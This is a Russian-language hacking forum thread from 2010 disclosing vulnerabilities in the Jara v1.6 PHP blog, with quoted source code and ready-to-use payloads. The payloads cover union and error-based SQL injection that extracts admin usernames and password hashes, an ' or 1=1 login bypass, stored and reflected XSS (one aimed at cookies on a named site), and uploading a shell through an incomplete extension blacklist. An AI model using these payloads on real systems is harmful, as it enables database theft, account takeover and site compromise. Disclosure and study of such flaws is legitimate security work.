
Blog Jara v1.6


nikp
06.04.2010, 22:35
Jara v1.6 - 1st March 2010
http://jara.xantiz.com/download.html

category.php
// category.php: the category id is taken from $_REQUEST (GET or POST); the '@'
// only silences the notice raised when "id" is absent, it does not validate anything.
@$categoryid = $_REQUEST["id"];
$category = jara_get_category($categoryid);
jara_page_start("Category: ".$category["title"]);
// $categoryid is interpolated verbatim into the SQL string; nothing escapes or casts it
// here, so with magic_quotes_gpc off the value reaches the query untouched.
$query = "select * from jara_posts where categoryid = '$categoryid'";
SQL
mq=off
http://localhost/jarav16/category.php?id=-1'+union+select+1,version(),3+--+

----------------------

view.php
session_start();
$id = $_REQUEST["id"];
if(isset($_POST["name"])) {
$name = $_POST["name"];
$website = $_POST["website"];
$comment = $_POST["comment"];
if(substr($website, 0, 4) != "http") {
$website = "javascript:;";
}
$name = htmlspecialchars($name);
$comment = strip_tags($comment);
if(!get_magic_quotes_gpc()) {
$name = addslashes($name);
$website = addslashes($website);
$comment = addslashes($comment);
}
if(strlen($name) > 64) {
$name = substr($name, 0, 60) . "...";
}
if(!empty($name) && !empty($comment) && $_POST["security"] == $_SESSION["result"]) {

@jara_db_query("insert into jara_comments values('0', '$id', '$name', '$website', '$comment', '".time()."')");

$id не фильтруется; при mq=off можно провести SQL injection + active XSS.
Из-за капчи удобнее использовать FireFox + Tamper Data

http://localhost/jarav16/view.php?id=1
заполняем
Your Name:
Your Comment:
Security Question:
и в Tamper Data правим id
id=1','Guest','','Hi!<script>alert(121212);</script>',1270547738) -- 1

По адресу http://localhost/jarav16/view.php?id=1 имеем alert.


----------------------

page.php
// page.php: $id comes straight from $_REQUEST and is interpolated into the query with
// no escaping, casting or parameter binding between the request and jara_db_query().
$id = $_REQUEST["id"];
$result = jara_db_query("select * from jara_pages where id = '$id' limit 1");
SQL
mq=off
http://localhost/jarav16/page.php?id=1'+union+select+1,username,unhex(hex(p assword)),4+from+jara_users+--+

Хеш хранится в формате SHA1 (без соли — см. SHA1('$password') в jara_user_authenticate)

----------------------

В админке:
admin/upload.php
if(is_writable("./../uploads/")) {
if($_FILES["userfile"]["size"] > 0) {
$ext = strtolower(end(explode(".", basename($_FILES["userfile"]["name"]))));
if($ext == "php" || $ext == "pl" || $ext == "exe" || $ext == "sh") {
echo "<p>You're trying to upload an extension that's not allowed. Please upload it inside a container such as a compressed archive.</p>";
}
else {
if($_FILES["userfile"]["error"] == 0) {
$filename = $_SESSION["jara_admin"] . "-" . strtolower(preg_replace("/[^a-zA-Z0-9]/", "-", basename($_FILES["userfile"]["name"]))) . "-" . time() . "." . strtolower(end(explode(".", basename($_FILES["userfile"]["name"]))));
if(move_uploaded_file($_FILES["userfile"]["tmp_name"], "./../uploads/$filename")) {
echo "<p><strong>Your file was uploaded to <a href=\"../uploads/$filename\">$filename</a> in the uploads directory.</strong></p>";


Shell
черный список расширений (php, pl, exe, sh) неполный: загружаются файлы с расширением .php3, .phtml

----------------------

Strilo4ka
07.04.2010, 00:57
Jara v1.6 - 1st March 2010
XSS
/search.php
...try {
jara_page_start("Search results");
$term = $_REQUEST["term"];
if(!get_magic_quotes_gpc()) {
$term = addslashes($term);......
echo "<p><strong>$num_rows</strong> results for <strong>".stripslashes($term)."</strong>.</p>";...
...<form action="search.php" method="post">
<p>
Search term: <input type="text" name="term" id="term" /><input type="submit" value="Go" />
</p>
</form>...Результат:
в поле term — XSS (значение выводится через stripslashes без htmlspecialchars)

Strilo4ka
07.04.2010, 01:20
SQL inj — классика жанра!
Входим в админку Jara v1.6

/login.php
require_once("include/jara_fns.php");
if(isset($_POST["login_action"])) {
try {
session_start();
$username = $_POST["username"];
$password = $_POST["password"];
if(!get_magic_quotes_gpc()) {
$username = addslashes($username);
$password = addslashes($password);
}
$result = jara_user_authenticate($_POST["username"], $_POST["password"]);
if($result == false) {
jara_page_start("Login failure");
echo "<p>\n";
echo "\tYou have entered an invalid username or password.<br />\n";
echo "\tPlease go back and try again.\n";
echo "</p>";
jara_page_end();
exit;
}
else {
header("Location: index.php");
}
}
catch(JaraDatabaseException $ex) {
jara_page_start("Login failure");...В функцию jara_user_authenticate вставляются $_POST["username"] и $_POST["password"].
Эта конструкция не имеет эффекта (экранированные $username/$password дальше не используются):
...$username = $_POST["username"];
$password = $_POST["password"];
if(!get_magic_quotes_gpc()) {
$username = addslashes($username);
$password = addslashes($password);
}...
/include/auth_fns.php...function jara_user_authenticate($username, $password) {
// Checks a username/password pair against jara_users and, on a match, stores the
// admin identity and the permission_* flags of the matched row in the session.
// Returns true on a match, false when the query yields no row.
// Both arguments are interpolated straight into the SQL string: this function does no
// escaping of its own, so every caller must escape (or better, bind) them. login.php
// above passes the raw $_POST values, so its addslashes() step never reaches this query.
$query = "select * from jara_users where username = '$username' and password = SHA1('$password') limit 1";
// The password is compared as a plain, unsalted SHA1 of the cleartext (no per-user salt,
// no password_hash()/password_verify()).
$result = jara_db_query($query);
if($result->num_rows == 0) {
return false;
}
else {
$row = $result->fetch_assoc();
// NOTE(review): session_regenerate_id() is not called here, so a session id that
// existed before login keeps its value after admin privilege is granted.
// The stored admin name is the caller-supplied $username, not $row["username"]
// from the row that actually matched.
$_SESSION["jara_admin"] = $username;
$_SESSION["jara_permissions"] = array($row["permission_posts"], $row["permission_pages"], $row["permission_users"], $row["permission_upload"]);
return true;
}
}...Условие:
mq=off

Результат:
<input type="text" id="username" name="username" width="20" />
в поле username ' or 1=1--[ ]

Strilo4ka
07.04.2010, 02:17
SQL inj
Jara v1.6

/admin/delete_category.php
...try {
$id = $_REQUEST["id"];
if($id == 1) {
throw new JaraGeneralException("You cannot the delete the Uncategorized category.");
}
$query = "delete from jara_categories where categoryid = '$id'";
$result = jara_db_query($query);...
/include/db_fns.php
...function jara_db_connect() {
// Returns the shared mysqli connection, opening it on first use.
// Connection details come from the global $jconfig object; the handle is cached in the
// global $db_conn so later calls reuse it.
// Throws JaraDatabaseException (first argument 1, presumably an error kind) when the
// connection attempt fails.
global $jconfig, $db_conn;
if($db_conn == null) {
// '@' hides the E_WARNING a failed connect emits; the errno check below is the only
// failure signal. NOTE(review): on PHP 8.1+ mysqli reports errors as
// mysqli_sql_exception by default, in which case the constructor throws before
// mysqli_connect_errno() is consulted — confirm the target PHP version.
@$conn = new mysqli($jconfig->mysql_host, $jconfig->mysql_username, $jconfig->mysql_password, $jconfig->mysql_db);
if(mysqli_connect_errno()) {
throw new JaraDatabaseException(1, mysqli_connect_errno(), mysqli_connect_error());
}
// No set_charset() call: the connection runs with whatever charset the client/server
// default to, which matters because callers escape with addslashes() rather than a
// charset-aware escaper or bound parameters.
$db_conn = $conn;
return $conn;
}
else {
return $db_conn;
}
}

function jara_db_query($query) {
// Runs $query on the shared connection and returns either the mysqli_result (for
// select/show/explain) or the affected-row count (everything else).
// Throws JaraDatabaseException (first argument 2, presumably an error kind) carrying
// errno, the error text and the query.
// The query string is executed exactly as given — there is no escaping or parameter
// binding here, so injection protection is entirely the caller's job, and the callers
// quoted in this thread interpolate $_REQUEST values directly.
$conn = jara_db_connect();
$result = $conn->query($query);
if($conn->errno) {
// The failing SQL text travels with the exception; if a catch block renders it, the
// error page echoes whatever the request put into the query.
throw new JaraDatabaseException(2, $conn->errno, $conn->error, $query);
}
// Result-vs-rowcount dispatch is a case-sensitive prefix test on the raw string.
// NOTE(review): "SELECT ..." or a query with leading whitespace falls through to
// affected_rows instead of returning the result set.
if(substr($query, 0, 6) == "select" || substr($query, 0, 4) == "show" || substr($query, 0, 7) == "explain") {
return $result;
}
else {
return $conn->affected_rows;
}
}Условие:
mq=off

Результат:
http://localhost/jarav/admin/delete_category.php?id=1[sql]
http://localhost/jarav/admin/delete_category.php?id=1' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(version(),floor(rand(0)*2)))--+

Также уязвимы другие скрипты!

Red_EYEs
09.04.2010, 02:49
http://xantiz.co.cc/blog/view.php?id=8%22%3E%3Cscript%3Ealert(document.cook ie)%3C/script%3E%3C%22 Если есть mq то можно и так